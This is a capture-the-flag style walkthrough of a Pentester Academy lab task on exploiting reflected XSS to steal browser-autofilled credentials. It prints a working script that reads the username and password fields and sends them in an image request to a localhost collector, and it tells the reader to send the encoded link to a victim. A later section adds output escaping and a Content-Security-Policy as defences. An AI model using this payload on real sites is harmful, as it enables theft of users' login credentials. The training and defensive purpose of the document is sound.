Javascript for Pentester Task 12

Hello Pentesters, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. This task is a bit different: you will learn how to grab the values the browser auto-fills into a website's form if the site is vulnerable to XSS. Modern web browsers do not seem to autofill the username and password, so you may have to try an old browser for this task. You can view solutions to the other tasks here.

Task 12: Stealing from Auto-Complete | Task Link

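The url parameter of the page is given as vulnerable to XSS injection; we can verify this by trying a few injections in it. The script below waits for the page to load, reads the two auto-filled form fields and sends them out in an image request.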

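<script>
// First form on the page (the login form the browser auto-fills)
var formcon = document.forms[0];
// Run once the page has finished loading
window.onload = get;
function get()
{
    // elements[0] is the username field, elements[1] the password field
    var un = formcon.elements[0].value;
    var up = formcon.elements[1].value;
    // An img element whose src carries the two values in the query string
    var a = document.createElement('img');
    a.src = 'http://localhost:8000/f?' + 'username=' + un + '&password=' + up;
    // Appending the element makes the browser issue the request
    document.body.appendChild(a);
}
</script>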

Copy and URL-encode the code, paste it as the value of the 'url' parameter on the same page, and send the link to your victim. When the victim opens the link, the username and password filled in by autofill are sent to the attacker's machine through the newly created img tag. You can also use other techniques to send the user details, such as XMLHttpRequest.
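Seen from the defending side, this flow depends on two things: the url parameter being reflected without encoding, and the page being allowed to run inline script and load images from another origin. The block below is an added example, not code from the task or from Pentester Academy; the page markup, `renderPage`, `reflectsMarkup` and `SECURITY_HEADERS` are assumed names built for illustration.

```javascript
// Added example. The login page markup and all names below are assumptions.

// HTML-encode a value before it is reflected into the page body.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Second layer: no inline script, and image loads, XHR and form posts
// are limited to the page's own origin.
const SECURITY_HEADERS = {
  'Content-Security-Policy':
    "default-src 'self'; script-src 'self'; img-src 'self'; " +
    "connect-src 'self'; form-action 'self'",
};

// Constructed login page that reflects the `url` parameter.
// encode=false is the vulnerable rendering, encode=true the corrected one.
function renderPage(urlParam, { encode }) {
  const reflected = encode ? escapeHtml(urlParam) : urlParam;
  return [
    '<form method="post" action="/login">',
    '  <input name="username" autocomplete="username">',
    '  <input name="password" type="password" autocomplete="current-password">',
    '</form>',
    `<p>Return to: ${reflected}</p>`,
  ].join('\n');
}

// True when the rendered page contains a live <script> or <img> element.
// The constructed page itself has neither, so any hit comes from the parameter.
function reflectsMarkup(html) {
  return /<\s*(script|img)\b/i.test(html);
}

// Constructed, inert probe value for the `url` parameter.
const probe = '<script>/* probe */</script>';
console.log('raw reflection keeps markup:    ',
  reflectsMarkup(renderPage(probe, { encode: false })));
console.log('encoded reflection keeps markup:',
  reflectsMarkup(renderPage(probe, { encode: true })));
console.log(SECURITY_HEADERS);
```

With the policy in place, a request like the img one above to another origin is refused by the browser even if an encoding mistake slips through elsewhere on the page.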
That’s all. Refer to this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided on the Pentester Academy website.